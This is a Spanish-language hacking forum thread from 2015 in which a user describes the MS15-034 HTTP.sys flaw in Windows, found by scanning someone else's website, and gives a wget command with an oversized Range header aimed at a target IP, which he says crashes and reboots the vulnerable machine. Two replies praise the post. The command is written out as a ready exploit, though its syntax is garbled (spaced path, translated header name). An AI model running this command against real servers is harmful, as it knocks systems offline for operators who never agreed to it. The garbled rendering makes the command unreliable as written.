This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Vulnerabilidad MS15-034 - HTTP.sys

  • 2 Replies
  • 6273 Views

0 Members and 1 Guest are viewing this topic.

Offline Aforak

  • *
  • Underc0der
  • Posts: 14
  • Actividad:
    3.33%
  • Reputación 0
    • View Profile

Vulnerabilidad MS15-034 - HTTP.sys

  • on: October 30, 2015, 11:49:44 am
Muy buenas underc0deanos, quiero explicar un tipo de vulnerabilidad en los sistemas windows que me encontré tras realizar un scan a una web ya que he encontrado poca información sobre esto y lo poco que he encontrado quisiera compartirlo para la gente que alguna vez encuentre este tipo de vulnerabilidad, comencemos :

¿De qué se trata esta vulnerabilidad?
La versión de Windows que se ejecuta en el host remoto se ve afectado por una vulnerabilidad en la pila del protocolo HTTP (HTTP.sys) debido a la inadecuada programación del análisis sintáctico sobre las peticiones HTTP artesanales. Un atacante remoto puede aprovechar esto para ejecutar código arbitrario con privilegios del sistema.
¿Cómo sé si una web contiene este fallo?
La verdad, no lo sé, en mi caso como ya dije que realicé un scan a una web, observé que había notificado esta vulnerabilidad de estado crítico y me informé de ella para saber cómo parchearla y explotarla.

¿Cómo puedo explotarla?
Fácil, usaremos wget(comando incluido en la terminal de Linux, si quieremos tenerlo para Windows debemos descargarlo de aquí :You are not allowed to view links. Register or Login)
Una vez lo tengamos en nuestro equipo usaremos el siguiente comando :
Code: You are not allowed to view links. Register or Login
wget -O / dev / null --header = "Rango: 0-18446744073709551615" http: // [dirección IP] /Este comando realiza el efecto de reiniciar el PC vulnerable, el comando wget consiste en descargar archivos de internet desde la terminal.
Si desean ver a qué sistemas afecta esta vulnerabilidad o tener más información --->You are not allowed to view links. Register or Login
En esa misma página pone que soluciones tiene de momento esta vulnerabilidad.
Si desean el escáner de vulnerabilidades Nessus aquí lo tienen --->You are not allowed to view links. Register or Login
Si desean ver el testeo de la penetración de esta vulnerabilidad aquí tenéis un vídeo realizado desde una VPS parece ser o algún software de virtualización

Espero que os sea útil mi aportamiento, grácias ;)
Fuente : Aforak / Jazze
« Last Edit: October 30, 2015, 03:33:20 pm by Gabriela »
KILL KILL KILL

Online ANTRAX

  • *
  • Administrator
  • Posts: 5849
  • Actividad:
    66.67%
  • Country: ar
  • Reputación 43
  • ANTRAX
  • Twitter: @Underc0de
    • View Profile
    • Underc0de
    • Email

Re:Vulnerabilidad MS15-034 - HTTP.sys

  • on: October 30, 2015, 12:03:25 pm
@You are not allowed to view links. Register or Login! muy buen aporte bro! Ahora me pondré a verlo en detalle!
Te dejo +c0in

Muchas gracias por compartirlo!!

Saludos!
ANTRAX
« Last Edit: October 30, 2015, 03:33:55 pm by Gabriela »


Offline Stuxnet

  • *
  • Underc0der
  • Posts: 259
  • Actividad:
    0%
  • Reputación 2
  • Twitter: _stuxnet
    • View Profile
    • Devel Security

Re:Vulnerabilidad MS15-034 - HTTP.sys

  • on: October 30, 2015, 01:53:39 pm
Pedazo de aporte :3 muy bueno ..

Siempre vale la pena entrar y no ver temas c/p
« Last Edit: October 30, 2015, 03:34:13 pm by Gabriela »
You are not allowed to view links. Register or Login